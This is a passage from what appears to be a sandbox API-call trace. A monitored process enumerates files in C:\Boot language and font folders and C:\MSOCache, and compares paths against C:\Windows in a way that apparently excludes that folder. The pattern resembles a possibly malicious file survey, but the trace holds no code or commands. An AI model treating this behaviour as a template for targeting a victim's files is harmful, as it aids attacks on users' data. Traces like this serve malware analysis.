ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.699] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.699] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.699] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0032.700] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.700] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.700] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.700] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.700] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.700] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.700] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0032.700] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.700] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.700] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.700] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.700] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.700] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.700] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0032.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.701] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.701] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.701] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.701] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.701] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.701] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0032.701] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.701] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.701] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.701] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0032.701] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.702] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0032.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.702] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.702] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.702] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.702] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.702] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0032.702] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.702] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.702] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.702] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.702] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.702] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.702] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0032.703] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.703] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.703] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.703] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.703] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.703] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.703] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0032.703] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.703] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.703] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.703] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.703] FindClose (in: hFindFile=0x662de8 | out: hFindFile=0x662de8) returned 1 [0032.703] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0032.703] FindNextFileW (in: hFindFile=0x661da0, lpFindFileData=0x33ffa84 | out: lpFindFileData=0x33ffa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0032.703] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39206d0 [0032.704] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662de8 [0032.846] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.846] FindNextFileW (in: hFindFile=0x662de8, lpFindFileData=0x33ff808 | out: lpFindFileData=0x33ff808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.145] FindNextFileW (in: hFindFile=0x3ef10c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.148] FindNextFileW (in: hFindFile=0x3ef10c0, lpFindFileData=0x33ff58c | out: lpFindFileData=0x33ff58c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0033.152] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 75 [0033.155] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 1 [0033.156] lstrlenW (lpString="Access.en-us") returned 12 [0033.156] lstrcmpiW (lpString1="C:\\Windows", lpString2="Access.en-us") returned 1 [0033.159] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x3ef34c0 [0033.304] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 75 [0033.304] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1180 [0033.304] FindNextFileW (in: hFindFile=0x3ef1180, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.304] FindNextFileW (in: hFindFile=0x3ef1180, lpFindFileData=0x33ff310 | out: lpFindFileData=0x33ff310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0033.305] lstrlenW (lpString="AccessMUI.msi") returned 13 [0033.305] lstrlenW 